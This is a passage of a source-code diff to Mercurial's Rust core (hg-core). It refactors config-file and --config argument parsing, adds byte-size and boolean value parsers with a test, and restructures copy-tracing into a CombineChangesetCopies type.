@@ -53,6 +51,51 @@
}
}
+ /// Parse `--config` CLI arguments and return a layer if there’s any
+ pub(crate) fn parse_cli_args(
+ cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>,
+ ) -> Result<Option<Self>, ConfigError> {
+ fn parse_one(arg: &[u8]) -> Option<(Vec<u8>, Vec<u8>, Vec<u8>)> {
+ use crate::utils::SliceExt;
+
+ let (section_and_item, value) = arg.split_2(b'=')?;
+ let (section, item) = section_and_item.trim().split_2(b'.')?;
+ Some((
+ section.to_owned(),
+ item.to_owned(),
+ value.trim().to_owned(),
+ ))
+ }
+
+ let mut layer = Self::new(ConfigOrigin::CommandLine);
+ for arg in cli_config_args {
+ let arg = arg.as_ref();
+ if let Some((section, item, value)) = parse_one(arg) {
+ layer.add(section, item, value, None);
+ } else {
+ Err(HgError::abort(format!(
+ "abort: malformed --config option: '{}' \
+ (use --config section.name=value)",
+ String::from_utf8_lossy(arg),
+ )))?
+ }
+ }
+ if layer.sections.is_empty() {
+ Ok(None)
+ } else {
+ Ok(Some(layer))
+ }
+ }
+
+ /// Returns whether this layer comes from `--config` CLI arguments
+ pub(crate) fn is_from_command_line(&self) -> bool {
+ if let ConfigOrigin::CommandLine = self.origin {
+ true
+ } else {
+ false
+ }
+ }
+
/// Add an entry to the config, overwriting the old one if already present.
pub fn add(
&mut self,
@@ -72,6 +115,14 @@
Some(self.sections.get(section)?.get(item)?)
}
+ /// Returns the keys defined in the given section
+ pub fn iter_keys(&self, section: &[u8]) -> impl Iterator<Item = &[u8]> {
+ self.sections
+ .get(section)
+ .into_iter()
+ .flat_map(|section| section.keys().map(|vec| &**vec))
+ }
+
pub fn is_empty(&self) -> bool {
self.sections.is_empty()
}
@@ -96,21 +147,39 @@
let mut section = b"".to_vec();
while let Some((index, bytes)) = lines_iter.next() {
+ let line = Some(index + 1);
if let Some(m) = INCLUDE_RE.captures(&bytes) {
let filename_bytes = &m[1];
- let filename_to_include = get_path_from_bytes(&filename_bytes);
- match read_include(&src, &filename_to_include) {
- (include_src, Ok(data)) => {
+ let filename_bytes = crate::utils::expand_vars(filename_bytes);
+ // `Path::parent` only fails for the root directory,
+ // which `src` can’t be since we’ve managed to open it as a
+ // file.
+ let dir = src
+ .parent()
+ .expect("Path::parent fail on a file we’ve read");
+ // `Path::join` with an absolute argument correctly ignores the
+ // base path
+ let filename = dir.join(&get_path_from_bytes(&filename_bytes));
+ match std::fs::read(&filename) {
+ Ok(data) => {
layers.push(current_layer);
- layers.extend(Self::parse(&include_src, &data)?);
+ layers.extend(Self::parse(&filename, &data)?);
current_layer =
Self::new(ConfigOrigin::File(src.to_owned()));
}
- (_, Err(e)) => {
- return Err(ConfigError::IncludeError {
- path: filename_to_include.to_owned(),
- io_error: e,
- })
+ Err(error) => {
+ if error.kind() != std::io::ErrorKind::NotFound {
+ return Err(ConfigParseError {
+ origin: ConfigOrigin::File(src.to_owned()),
+ line,
+ message: format_bytes!(
+ b"cannot include {} ({})",
+ filename_bytes,
+ format_bytes::Utf8(error)
+ ),
+ }
+ .into());
+ }
}
}
} else if let Some(_) = EMPTY_RE.captures(&bytes) {
@@ -134,22 +203,23 @@
};
lines_iter.next();
}
- current_layer.add(
- section.clone(),
- item,
- value,
- Some(index + 1),
- );
+ current_layer.add(section.clone(), item, value, line);
} else if let Some(m) = UNSET_RE.captures(&bytes) {
if let Some(map) = current_layer.sections.get_mut(§ion) {
map.remove(&m[1]);
}
} else {
- return Err(ConfigError::Parse {
+ let message = if bytes.starts_with(b" ") {
+ format_bytes!(b"unexpected leading whitespace: {}", bytes)
+ } else {
+ bytes.to_owned()
+ };
+ return Err(ConfigParseError {
origin: ConfigOrigin::File(src.to_owned()),
- line: Some(index + 1),
- bytes: bytes.to_owned(),
- });
+ line,
+ message,
+ }
+ .into());
}
}
if !current_layer.is_empty() {
@@ -159,8 +229,11 @@
}
}
-impl std::fmt::Debug for ConfigLayer {
- fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+impl DisplayBytes for ConfigLayer {
+ fn display_bytes(
+ &self,
+ out: &mut dyn std::io::Write,
+ ) -> std::io::Result<()> {
let mut sections: Vec<_> = self.sections.iter().collect();
sections.sort_by(|e0, e1| e0.0.cmp(e1.0));
@@ -169,16 +242,13 @@
items.sort_by(|e0, e1| e0.0.cmp(e1.0));
for (item, config_entry) in items {
- writeln!(
- f,
- "{}",
- String::from_utf8_lossy(&format_bytes!(
- b"{}.{}={} # {}",
- section,
- item,
- &config_entry.bytes,
- &self.origin.to_bytes(),
- ))
+ write_bytes!(
+ out,
+ b"{}.{}={} # {}\n",
+ section,
+ item,
+ &config_entry.bytes,
+ &self.origin,
)?
}
}
@@ -205,9 +275,11 @@
#[derive(Clone, Debug)]
pub enum ConfigOrigin {
- /// The value comes from a configuration file
+ /// From a configuration file
File(PathBuf),
- /// The value comes from the environment like `$PAGER` or `$EDITOR`
+ /// From a `--config` CLI argument
+ CommandLine,
+ /// From environment variables like `$PAGER` or `$EDITOR`
Environment(Vec<u8>),
/* TODO cli
* TODO defaults (configitems.py)
@@ -216,53 +288,32 @@
* Others? */
}
-impl ConfigOrigin {
- /// TODO use some kind of dedicated trait?
- pub fn to_bytes(&self) -> Vec<u8> {
+impl DisplayBytes for ConfigOrigin {
+ fn display_bytes(
+ &self,
+ out: &mut dyn std::io::Write,
+ ) -> std::io::Result<()> {
match self {
- ConfigOrigin::File(p) => get_bytes_from_path(p),
- ConfigOrigin::Environment(e) => e.to_owned(),
+ ConfigOrigin::File(p) => out.write_all(&get_bytes_from_path(p)),
+ ConfigOrigin::CommandLine => out.write_all(b"--config"),
+ ConfigOrigin::Environment(e) => write_bytes!(out, b"${}", e),
}
}
}
#[derive(Debug)]
-pub enum ConfigError {
- Parse {
- origin: ConfigOrigin,
- line: Option<usize>,
- bytes: Vec<u8>,
- },
- /// Failed to include a sub config file
- IncludeError {
- path: PathBuf,
- io_error: std::io::Error,
- },
- /// Any IO error that isn't expected
- IO(std::io::Error),
+pub struct ConfigParseError {
+ pub origin: ConfigOrigin,
+ pub line: Option<usize>,
+ pub message: Vec<u8>,
}
-impl From<std::io::Error> for ConfigError {
- fn from(e: std::io::Error) -> Self {
- Self::IO(e)
- }
+#[derive(Debug, derive_more::From)]
+pub enum ConfigError {
+ Parse(ConfigParseError),
+ Other(HgError),
}
fn make_regex(pattern: &'static str) -> Regex {
Regex::new(pattern).expect("expected a valid regex")
}
-
-/// Includes are relative to the file they're defined in, unless they're
-/// absolute.
-fn read_include(
- old_src: &Path,
- new_src: &Path,
-) -> (PathBuf, io::Result<Vec<u8>>) {
- if new_src.is_absolute() {
- (new_src.to_path_buf(), read_whole_file(&new_src))
- } else {
- let dir = old_src.parent().unwrap();
- let new_src = dir.join(&new_src);
- (new_src.to_owned(), read_whole_file(&new_src))
- }
-}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/config/values.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,61 @@
+//! Parsing functions for various type of configuration values.
+//!
+//! Returning `None` indicates a syntax error. Using a `Result` would be more
+//! correct but would take more boilerplate for converting between error types,
+//! compared to using `.ok()` on inner results of various error types to
+//! convert them all to options. The `Config::get_parse` method later converts
+//! those options to results with `ConfigValueParseError`, which contains
+//! details about where the value came from (but omits details of what’s
+//! invalid inside the value).
+
+pub(super) fn parse_bool(v: &[u8]) -> Option<bool> {
+ match v.to_ascii_lowercase().as_slice() {
+ b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true),
+ b"0" | b"no" | b"false" | b"off" | b"never" => Some(false),
+ _ => None,
+ }
+}
+
+pub(super) fn parse_byte_size(value: &[u8]) -> Option<u64> {
+ let value = std::str::from_utf8(value).ok()?.to_ascii_lowercase();
+ const UNITS: &[(&str, u64)] = &[
+ ("g", 1 << 30),
+ ("gb", 1 << 30),
+ ("m", 1 << 20),
+ ("mb", 1 << 20),
+ ("k", 1 << 10),
+ ("kb", 1 << 10),
+ ("b", 1 << 0), // Needs to be last
+ ];
+ for &(unit, multiplier) in UNITS {
+ // TODO: use `value.strip_suffix(unit)` when we require Rust 1.45+
+ if value.ends_with(unit) {
+ let value_before_unit = &value[..value.len() - unit.len()];
+ let float: f64 = value_before_unit.trim().parse().ok()?;
+ if float >= 0.0 {
+ return Some((float * multiplier as f64).round() as u64);
+ } else {
+ return None;
+ }
+ }
+ }
+ value.parse().ok()
+}
+
+#[test]
+fn test_parse_byte_size() {
+ assert_eq!(parse_byte_size(b""), None);
+ assert_eq!(parse_byte_size(b"b"), None);
+
+ assert_eq!(parse_byte_size(b"12"), Some(12));
+ assert_eq!(parse_byte_size(b"12b"), Some(12));
+ assert_eq!(parse_byte_size(b"12 b"), Some(12));
+ assert_eq!(parse_byte_size(b"12.1 b"), Some(12));
+ assert_eq!(parse_byte_size(b"1.1 K"), Some(1126));
+ assert_eq!(parse_byte_size(b"1.1 kB"), Some(1126));
+
+ assert_eq!(parse_byte_size(b"-12 b"), None);
+ assert_eq!(parse_byte_size(b"-0.1 b"), None);
+ assert_eq!(parse_byte_size(b"0.1 b"), Some(0));
+ assert_eq!(parse_byte_size(b"12.1 b"), Some(12));
+}
--- a/rust/hg-core/src/copy_tracing.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/copy_tracing.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,46 +1,121 @@
+#[cfg(test)]
+#[macro_use]
+mod tests_support;
+
+#[cfg(test)]
+mod tests;
+
use crate::utils::hg_path::HgPath;
use crate::utils::hg_path::HgPathBuf;
use crate::Revision;
use crate::NULL_REVISION;
-use im_rc::ordmap::DiffItem;
+use bytes_cast::{unaligned, BytesCast};
use im_rc::ordmap::Entry;
use im_rc::ordmap::OrdMap;
+use im_rc::OrdSet;
use std::cmp::Ordering;
use std::collections::HashMap;
-use std::convert::TryInto;
pub type PathCopies = HashMap<HgPathBuf, HgPathBuf>;
type PathToken = usize;
-#[derive(Clone, Debug, PartialEq, Copy)]
-struct TimeStampedPathCopy {
+#[derive(Clone, Debug)]
+struct CopySource {
/// revision at which the copy information was added
rev: Revision,
/// the copy source, (Set to None in case of deletion of the associated
/// key)
path: Option<PathToken>,
+ /// a set of previous `CopySource.rev` value directly or indirectly
+ /// overwritten by this one.
+ overwritten: OrdSet<Revision>,
+}
+
+impl CopySource {
+ /// create a new CopySource
+ ///
+ /// Use this when no previous copy source existed.
+ fn new(rev: Revision, path: Option<PathToken>) -> Self {
+ Self {
+ rev,
+ path,
+ overwritten: OrdSet::new(),
+ }
+ }
+
+ /// create a new CopySource from merging two others
+ ///
+ /// Use this when merging two InternalPathCopies requires active merging of
+ /// some entries.
+ fn new_from_merge(rev: Revision, winner: &Self, loser: &Self) -> Self {
+ let mut overwritten = OrdSet::new();
+ overwritten.extend(winner.overwritten.iter().copied());
+ overwritten.extend(loser.overwritten.iter().copied());
+ overwritten.insert(winner.rev);
+ overwritten.insert(loser.rev);
+ Self {
+ rev,
+ path: winner.path,
+ overwritten: overwritten,
+ }
+ }
+
+ /// Update the value of a pre-existing CopySource
+ ///
+ /// Use this when recording copy information from parent → child edges
+ fn overwrite(&mut self, rev: Revision, path: Option<PathToken>) {
+ self.overwritten.insert(self.rev);
+ self.rev = rev;
+ self.path = path;
+ }
+
+ /// Mark pre-existing copy information as "dropped" by a file deletion
+ ///
+ /// Use this when recording copy information from parent → child edges
+ fn mark_delete(&mut self, rev: Revision) {
+ self.overwritten.insert(self.rev);
+ self.rev = rev;
+ self.path = None;
+ }
+
+ /// Mark pre-existing copy information as "dropped" by a file deletion
+ ///
+ /// Use this when recording copy information from parent → child edges
+ fn mark_delete_with_pair(&mut self, rev: Revision, other: &Self) {
+ self.overwritten.insert(self.rev);
+ if other.rev != rev {
+ self.overwritten.insert(other.rev);
+ }
+ self.overwritten.extend(other.overwritten.iter().copied());
+ self.rev = rev;
+ self.path = None;
+ }
+
+ fn is_overwritten_by(&self, other: &Self) -> bool {
+ other.overwritten.contains(&self.rev)
+ }
+}
+
+// For the same "dest", content generated for a given revision will always be
+// the same.
+impl PartialEq for CopySource {
+ fn eq(&self, other: &Self) -> bool {
+ #[cfg(debug_assertions)]
+ {
+ if self.rev == other.rev {
+ debug_assert!(self.path == other.path);
+ debug_assert!(self.overwritten == other.overwritten);
+ }
+ }
+ self.rev == other.rev
+ }
}
/// maps CopyDestination to Copy Source (+ a "timestamp" for the operation)
-type TimeStampedPathCopies = OrdMap<PathToken, TimeStampedPathCopy>;
-
-/// hold parent 1, parent 2 and relevant files actions.
-pub type RevInfo<'a> = (Revision, Revision, ChangedFiles<'a>);
-
-/// represent the files affected by a changesets
-///
-/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need
-/// all the data categories tracked by it.
-/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need
-/// all the data categories tracked by it.
-pub struct ChangedFiles<'a> {
- nb_items: u32,
- index: &'a [u8],
- data: &'a [u8],
-}
+type InternalPathCopies = OrdMap<PathToken, CopySource>;
/// Represent active changes that affect the copy tracing.
enum Action<'a> {
@@ -51,7 +126,8 @@
Removed(&'a HgPath),
/// The parent ? children edge introduce copy information between (dest,
/// source)
- Copied(&'a HgPath, &'a HgPath),
+ CopiedFromP1(&'a HgPath, &'a HgPath),
+ CopiedFromP2(&'a HgPath, &'a HgPath),
}
/// This express the possible "special" case we can get in a merge
@@ -67,9 +143,6 @@
Normal,
}
-type FileChange<'a> = (u8, &'a HgPath, &'a HgPath);
-
-const EMPTY: &[u8] = b"";
const COPY_MASK: u8 = 3;
const P1_COPY: u8 = 2;
const P2_COPY: u8 = 3;
@@ -78,142 +151,94 @@
const MERGED: u8 = 8;
const SALVAGED: u8 = 16;
-impl<'a> ChangedFiles<'a> {
- const INDEX_START: usize = 4;
- const ENTRY_SIZE: u32 = 9;
- const FILENAME_START: u32 = 1;
- const COPY_SOURCE_START: u32 = 5;
+#[derive(BytesCast)]
+#[repr(C)]
+struct ChangedFilesIndexEntry {
+ flags: u8,
- pub fn new(data: &'a [u8]) -> Self {
- assert!(
- data.len() >= 4,
- "data size ({}) is too small to contain the header (4)",
- data.len()
- );
- let nb_items_raw: [u8; 4] = (&data[0..=3])
- .try_into()
- .expect("failed to turn 4 bytes into 4 bytes");
- let nb_items = u32::from_be_bytes(nb_items_raw);
+ /// Only the end position is stored. The start is at the end of the
+ /// previous entry.
+ destination_path_end_position: unaligned::U32Be,
- let index_size = (nb_items * Self::ENTRY_SIZE) as usize;
- let index_end = Self::INDEX_START + index_size;
+ source_index_entry_position: unaligned::U32Be,
+}
+
+fn _static_assert_size_of() {
+ let _ = std::mem::transmute::<ChangedFilesIndexEntry, [u8; 9]>;
+}
- assert!(
- data.len() >= index_end,
- "data size ({}) is too small to fit the index_data ({})",
- data.len(),
- index_end
- );
+/// Represents the files affected by a changeset.
+///
+/// This holds a subset of `mercurial.metadata.ChangingFiles` as we do not need
+/// all the data categories tracked by it.
+pub struct ChangedFiles<'a> {
+ index: &'a [ChangedFilesIndexEntry],
+ paths: &'a [u8],
+}
- let ret = ChangedFiles {
- nb_items,
- index: &data[Self::INDEX_START..index_end],
- data: &data[index_end..],
- };
- let max_data = ret.filename_end(nb_items - 1) as usize;
- assert!(
- ret.data.len() >= max_data,
- "data size ({}) is too small to fit all data ({})",
- data.len(),
- index_end + max_data
- );
- ret
+impl<'a> ChangedFiles<'a> {
+ pub fn new(data: &'a [u8]) -> Self {
+ let (header, rest) = unaligned::U32Be::from_bytes(data).unwrap();
+ let nb_index_entries = header.get() as usize;
+ let (index, paths) =
+ ChangedFilesIndexEntry::slice_from_bytes(rest, nb_index_entries)
+ .unwrap();
+ Self { index, paths }
}
pub fn new_empty() -> Self {
ChangedFiles {
- nb_items: 0,
- index: EMPTY,
- data: EMPTY,
+ index: &[],
+ paths: &[],
}
}
- /// internal function to return an individual entry at a given index
- fn entry(&'a self, idx: u32) -> FileChange<'a> {
- if idx >= self.nb_items {
- panic!(
- "index for entry is higher that the number of file {} >= {}",
- idx, self.nb_items
- )
- }
- let flags = self.flags(idx);
- let filename = self.filename(idx);
- let copy_idx = self.copy_idx(idx);
- let copy_source = self.filename(copy_idx);
- (flags, filename, copy_source)
- }
-
- /// internal function to return the filename of the entry at a given index
- fn filename(&self, idx: u32) -> &HgPath {
- let filename_start;
- if idx == 0 {
- filename_start = 0;
+ /// Internal function to return the filename of the entry at a given index
+ fn path(&self, idx: usize) -> &HgPath {
+ let start = if idx == 0 {
+ 0
} else {
- filename_start = self.filename_end(idx - 1)
- }
- let filename_end = self.filename_end(idx);
- let filename_start = filename_start as usize;
- let filename_end = filename_end as usize;
- HgPath::new(&self.data[filename_start..filename_end])
- }
-
- /// internal function to return the flag field of the entry at a given
- /// index
- fn flags(&self, idx: u32) -> u8 {
- let idx = idx as usize;
- self.index[idx * (Self::ENTRY_SIZE as usize)]
- }
-
- /// internal function to return the end of a filename part at a given index
- fn filename_end(&self, idx: u32) -> u32 {
- let start = (idx * Self::ENTRY_SIZE) + Self::FILENAME_START;
- let end = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START;
- let start = start as usize;
- let end = end as usize;
- let raw = (&self.index[start..end])
- .try_into()
- .expect("failed to turn 4 bytes into 4 bytes");
- u32::from_be_bytes(raw)
- }
-
- /// internal function to return index of the copy source of the entry at a
- /// given index
- fn copy_idx(&self, idx: u32) -> u32 {
- let start = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START;
- let end = (idx + 1) * Self::ENTRY_SIZE;
- let start = start as usize;
- let end = end as usize;
- let raw = (&self.index[start..end])
- .try_into()
- .expect("failed to turn 4 bytes into 4 bytes");
- u32::from_be_bytes(raw)
+ self.index[idx - 1].destination_path_end_position.get() as usize
+ };
+ let end = self.index[idx].destination_path_end_position.get() as usize;
+ HgPath::new(&self.paths[start..end])
}
/// Return an iterator over all the `Action` in this instance.
- fn iter_actions(&self, parent: Parent) -> ActionsIterator {
- ActionsIterator {
- changes: &self,
- parent: parent,
- current: 0,
- }
+ fn iter_actions(&self) -> impl Iterator<Item = Action> {
+ self.index.iter().enumerate().flat_map(move |(idx, entry)| {
+ let path = self.path(idx);
+ if (entry.flags & ACTION_MASK) == REMOVED {
+ Some(Action::Removed(path))
+ } else if (entry.flags & COPY_MASK) == P1_COPY {
+ let source_idx =
+ entry.source_index_entry_position.get() as usize;
+ Some(Action::CopiedFromP1(path, self.path(source_idx)))
+ } else if (entry.flags & COPY_MASK) == P2_COPY {
+ let source_idx =
+ entry.source_index_entry_position.get() as usize;
+ Some(Action::CopiedFromP2(path, self.path(source_idx)))
+ } else {
+ None
+ }
+ })
}
/// return the MergeCase value associated with a filename
fn get_merge_case(&self, path: &HgPath) -> MergeCase {
- if self.nb_items == 0 {
+ if self.index.is_empty() {
return MergeCase::Normal;
}
let mut low_part = 0;
- let mut high_part = self.nb_items;
+ let mut high_part = self.index.len();
while low_part < high_part {
let cursor = (low_part + high_part - 1) / 2;
- let (flags, filename, _source) = self.entry(cursor);
- match path.cmp(filename) {
+ match path.cmp(self.path(cursor)) {
Ordering::Less => low_part = cursor + 1,
Ordering::Greater => high_part = cursor,
Ordering::Equal => {
- return match flags & ACTION_MASK {
+ return match self.index[cursor].flags & ACTION_MASK {
MERGED => MergeCase::Merged,
SALVAGED => MergeCase::Salvaged,
_ => MergeCase::Normal,
@@ -225,100 +250,6 @@
}
}
-/// A struct responsible for answering "is X ancestors of Y" quickly
-///
-/// The structure will delegate ancestors call to a callback, and cache the
-/// result.
-#[derive(Debug)]
-struct AncestorOracle<'a, A: Fn(Revision, Revision) -> bool> {
- inner: &'a A,
- pairs: HashMap<(Revision, Revision), bool>,
-}
-
-impl<'a, A: Fn(Revision, Revision) -> bool> AncestorOracle<'a, A> {
- fn new(func: &'a A) -> Self {
- Self {
- inner: func,
- pairs: HashMap::default(),
- }
- }
-
- fn record_overwrite(&mut self, anc: Revision, desc: Revision) {
- self.pairs.insert((anc, desc), true);
- }
-
- /// returns `true` if `anc` is an ancestors of `desc`, `false` otherwise
- fn is_overwrite(&mut self, anc: Revision, desc: Revision) -> bool {
- if anc > desc {
- false
- } else if anc == desc {
- true
- } else {
- if let Some(b) = self.pairs.get(&(anc, desc)) {
- *b
- } else {
- let b = (self.inner)(anc, desc);
- self.pairs.insert((anc, desc), b);
- b
- }
- }
- }
-}
-
-struct ActionsIterator<'a> {
- changes: &'a ChangedFiles<'a>,
- parent: Parent,
- current: u32,
-}
-
-impl<'a> Iterator for ActionsIterator<'a> {
- type Item = Action<'a>;
-
- fn next(&mut self) -> Option<Action<'a>> {
- let copy_flag = match self.parent {
- Parent::FirstParent => P1_COPY,
- Parent::SecondParent => P2_COPY,
- };
- while self.current < self.changes.nb_items {
- let (flags, file, source) = self.changes.entry(self.current);
- self.current += 1;
- if (flags & ACTION_MASK) == REMOVED {
- return Some(Action::Removed(file));
- }
- let copy = flags & COPY_MASK;
- if copy == copy_flag {
- return Some(Action::Copied(file, source));
- }
- }
- return None;
- }
-}
-
-/// A small struct whose purpose is to ensure lifetime of bytes referenced in
-/// ChangedFiles
-///
-/// It is passed to the RevInfoMaker callback who can assign any necessary
-/// content to the `data` attribute. The copy tracing code is responsible for
-/// keeping the DataHolder alive at least as long as the ChangedFiles object.
-pub struct DataHolder<D> {
- /// RevInfoMaker callback should assign data referenced by the
- /// ChangedFiles struct it return to this attribute. The DataHolder
- /// lifetime will be at least as long as the ChangedFiles one.
- pub data: Option<D>,
-}
-
-pub type RevInfoMaker<'a, D> =
- Box<dyn for<'r> Fn(Revision, &'r mut DataHolder<D>) -> RevInfo<'r> + 'a>;
-
-/// enum used to carry information about the parent → child currently processed
-#[derive(Copy, Clone, Debug)]
-enum Parent {
- /// The `p1(x) → x` edge
- FirstParent,
- /// The `p2(x) → x` edge
- SecondParent,
-}
-
/// A small "tokenizer" responsible of turning full HgPath into lighter
/// PathToken
///
@@ -345,123 +276,110 @@
}
fn untokenize(&self, token: PathToken) -> &HgPathBuf {
- assert!(token < self.path.len(), format!("Unknown token: {}", token));
+ assert!(token < self.path.len(), "Unknown token: {}", token);
&self.path[token]
}
}
/// Same as mercurial.copies._combine_changeset_copies, but in Rust.
-///
-/// Arguments are:
-///
-/// revs: all revisions to be considered
-/// children: a {parent ? [childrens]} mapping
-/// target_rev: the final revision we are combining copies to
-/// rev_info(rev): callback to get revision information:
-/// * first parent
-/// * second parent
-/// * ChangedFiles
-/// isancestors(low_rev, high_rev): callback to check if a revision is an
-/// ancestor of another
-pub fn combine_changeset_copies<A: Fn(Revision, Revision) -> bool, D>(
- revs: Vec<Revision>,
- mut children_count: HashMap<Revision, usize>,
- target_rev: Revision,
- rev_info: RevInfoMaker<D>,
- is_ancestor: &A,
-) -> PathCopies {
- let mut all_copies = HashMap::new();
- let mut oracle = AncestorOracle::new(is_ancestor);
-
- let mut path_map = TwoWayPathMap::default();
-
- for rev in revs {
- let mut d: DataHolder<D> = DataHolder { data: None };
- let (p1, p2, changes) = rev_info(rev, &mut d);
+pub struct CombineChangesetCopies {
+ all_copies: HashMap<Revision, InternalPathCopies>,
+ path_map: TwoWayPathMap,
+ children_count: HashMap<Revision, usize>,
+}
- // We will chain the copies information accumulated for the parent with
- // the individual copies information the curent revision. Creating a
- // new TimeStampedPath for each `rev` → `children` vertex.
- let mut copies: Option<TimeStampedPathCopies> = None;
- if p1 != NULL_REVISION {
- // Retrieve data computed in a previous iteration
- let parent_copies = get_and_clean_parent_copies(
- &mut all_copies,
- &mut children_count,
- p1,
- );
- if let Some(parent_copies) = parent_copies {
- // combine it with data for that revision
- let vertex_copies = add_from_changes(
- &mut path_map,
- &mut oracle,
- &parent_copies,
- &changes,
- Parent::FirstParent,
- rev,
- );
- // keep that data around for potential later combination
- copies = Some(vertex_copies);
- }
- }
- if p2 != NULL_REVISION {
- // Retrieve data computed in a previous iteration
- let parent_copies = get_and_clean_parent_copies(
- &mut all_copies,
- &mut children_count,
- p2,
- );
- if let Some(parent_copies) = parent_copies {
- // combine it with data for that revision
- let vertex_copies = add_from_changes(
- &mut path_map,
- &mut oracle,
- &parent_copies,
- &changes,
- Parent::SecondParent,
- rev,
- );
-
- copies = match copies {
- None => Some(vertex_copies),
- // Merge has two parents needs to combines their copy
- // information.
- //
- // If we got data from both parents, We need to combine
- // them.
- Some(copies) => Some(merge_copies_dict(
- &path_map,
- rev,
- vertex_copies,
- copies,
- &changes,
- &mut oracle,
- )),
- };
- }
- }
- match copies {
- Some(copies) => {
- all_copies.insert(rev, copies);
- }
- _ => {}
+impl CombineChangesetCopies {
+ pub fn new(children_count: HashMap<Revision, usize>) -> Self {
+ Self {
+ all_copies: HashMap::new(),
+ path_map: TwoWayPathMap::default(),
+ children_count,
}
}
- // Drop internal information (like the timestamp) and return the final
- // mapping.
- let tt_result = all_copies
- .remove(&target_rev)
- .expect("target revision was not processed");
- let mut result = PathCopies::default();
- for (dest, tt_source) in tt_result {
- if let Some(path) = tt_source.path {
- let path_dest = path_map.untokenize(dest).to_owned();
- let path_path = path_map.untokenize(path).to_owned();
- result.insert(path_dest, path_path);
+ /// Combined the given `changes` data specific to `rev` with the data
+ /// previously given for its parents (and transitively, its ancestors).
+ pub fn add_revision(
+ &mut self,
+ rev: Revision,
+ p1: Revision,
+ p2: Revision,
+ changes: ChangedFiles<'_>,
+ ) {
+ self.add_revision_inner(rev, p1, p2, changes.iter_actions(), |path| {
+ changes.get_merge_case(path)
+ })
+ }
+
+ /// Separated out from `add_revsion` so that unit tests can call this
+ /// without synthetizing a `ChangedFiles` in binary format.
+ fn add_revision_inner<'a>(
+ &mut self,
+ rev: Revision,
+ p1: Revision,
+ p2: Revision,
+ copy_actions: impl Iterator<Item = Action<'a>>,
+ get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy,
+ ) {
+ // Retrieve data computed in a previous iteration
+ let p1_copies = match p1 {
+ NULL_REVISION => None,
+ _ => get_and_clean_parent_copies(
+ &mut self.all_copies,
+ &mut self.children_count,
+ p1,
+ ), // will be None if the vertex is not to be traversed
+ };
+ let p2_copies = match p2 {
+ NULL_REVISION => None,
+ _ => get_and_clean_parent_copies(
+ &mut self.all_copies,
+ &mut self.children_count,
+ p2,
+ ), // will be None if the vertex is not to be traversed
+ };
+ // combine it with data for that revision
+ let (p1_copies, p2_copies) = chain_changes(
+ &mut self.path_map,
+ p1_copies,
+ p2_copies,
+ copy_actions,
+ rev,
+ );
+ let copies = match (p1_copies, p2_copies) {
+ (None, None) => None,
+ (c, None) => c,
+ (None, c) => c,
+ (Some(p1_copies), Some(p2_copies)) => Some(merge_copies_dict(
+ &self.path_map,
+ rev,
+ p2_copies,
+ p1_copies,
+ get_merge_case,
+ )),
+ };
+ if let Some(c) = copies {
+ self.all_copies.insert(rev, c);
}
}
- result
+
+ /// Drop intermediate data (such as which revision a copy was from) and
+ /// return the final mapping.
+ pub fn finish(mut self, target_rev: Revision) -> PathCopies {
+ let tt_result = self
+ .all_copies
+ .remove(&target_rev)
+ .expect("target revision was not processed");
+ let mut result = PathCopies::default();
+ for (dest, tt_source) in tt_result {
+ if let Some(path) = tt_source.path {
+ let path_dest = self.path_map.untokenize(dest).to_owned();
+ let path_path = self.path_map.untokenize(path).to_owned();
+ result.insert(path_dest, path_path);
+ }
+ }
+ result
+ }
}
/// fetch previous computed information
@@ -471,68 +389,67 @@
///
/// If parent is not part of the set we are expected to walk, return None.
fn get_and_clean_parent_copies(
- all_copies: &mut HashMap<Revision, TimeStampedPathCopies>,
+ all_copies: &mut HashMap<Revision, InternalPathCopies>,
children_count: &mut HashMap<Revision, usize>,
parent_rev: Revision,
-) -> Option<TimeStampedPathCopies> {
+) -> Option<InternalPathCopies> {
let count = children_count.get_mut(&parent_rev)?;
*count -= 1;
if *count == 0 {
match all_copies.remove(&parent_rev) {
Some(c) => Some(c),
- None => Some(TimeStampedPathCopies::default()),
+ None => Some(InternalPathCopies::default()),
}
} else {
match all_copies.get(&parent_rev) {
Some(c) => Some(c.clone()),
- None => Some(TimeStampedPathCopies::default()),
+ None => Some(InternalPathCopies::default()),
}
}
}
/// Combine ChangedFiles with some existing PathCopies information and return
/// the result
-fn add_from_changes<A: Fn(Revision, Revision) -> bool>(
+fn chain_changes<'a>(
path_map: &mut TwoWayPathMap,
- oracle: &mut AncestorOracle<A>,
- base_copies: &TimeStampedPathCopies,
- changes: &ChangedFiles,
- parent: Parent,
+ base_p1_copies: Option<InternalPathCopies>,
+ base_p2_copies: Option<InternalPathCopies>,
+ copy_actions: impl Iterator<Item = Action<'a>>,
current_rev: Revision,
-) -> TimeStampedPathCopies {
- let mut copies = base_copies.clone();
- for action in changes.iter_actions(parent) {
+) -> (Option<InternalPathCopies>, Option<InternalPathCopies>) {
+ // Fast path the "nothing to do" case.
+ if let (None, None) = (&base_p1_copies, &base_p2_copies) {
+ return (None, None);
+ }
+
+ let mut p1_copies = base_p1_copies.clone();
+ let mut p2_copies = base_p2_copies.clone();
+ for action in copy_actions {
match action {
- Action::Copied(path_dest, path_source) => {
- let dest = path_map.tokenize(path_dest);
- let source = path_map.tokenize(path_source);
- let entry;
- if let Some(v) = base_copies.get(&source) {
- entry = match &v.path {
- Some(path) => Some((*(path)).to_owned()),
- None => Some(source.to_owned()),
- }
- } else {
- entry = Some(source.to_owned());
+ Action::CopiedFromP1(path_dest, path_source) => {
+ match &mut p1_copies {
+ None => (), // This is not a vertex we should proceed.
+ Some(copies) => add_one_copy(
+ current_rev,
+ path_map,
+ copies,
+ base_p1_copies.as_ref().unwrap(),
+ path_dest,
+ path_source,
+ ),
}
- // Each new entry is introduced by the children, we
- // record this information as we will need it to take
- // the right decision when merging conflicting copy
